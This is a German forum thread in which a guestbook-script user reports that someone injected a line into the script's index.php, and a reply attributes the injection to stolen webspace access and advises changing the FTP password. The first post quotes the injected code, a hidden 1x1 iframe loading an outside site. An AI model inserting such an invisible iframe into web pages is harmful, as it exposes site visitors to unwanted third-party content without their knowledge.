Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
Hacker ??
#1
Hallo erst einmal und danke für das tolle gästebuchscript.

ich glaube da da jemand ein weg gefunden hat um in der index.php des GB-Sripts in der letzten zeile wo php geschlossen wird genau zwichen "? und >" folgende zeile einzufügen.
<html><body><iframe src="http://zxstats.com/" width="1" height="1" frameborder="0"></iframe></body></html>

meine frage wäre nun wie ich das in zukunft verhindern kann, weil ich nicht unbedingt das GB Script wechseln möchte.

MfG
Zitieren
#2
Selbst wenn es jemand geschafft hätte, in die index.php diesen code einzufügen, dann mit Sicherheit nicht Aufgrund von irgendwelchen Sicherheitslücken im Gästebuchscript. Schon gar nicht, wenn das nicht mal in der Administration stattgefunden hat. Hier hat sich jemand Zugriff auf Deinen Webspace verschafft. Das hat mit dem Gästebuch rein gar nichts zu tun, denn er hätte auch alles andere was dort so drauf liegt ändern können.

An Deiner Stelle würde ich das Passwort für den FTP-Account oder das Webinterface ändern.
Zitieren


Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste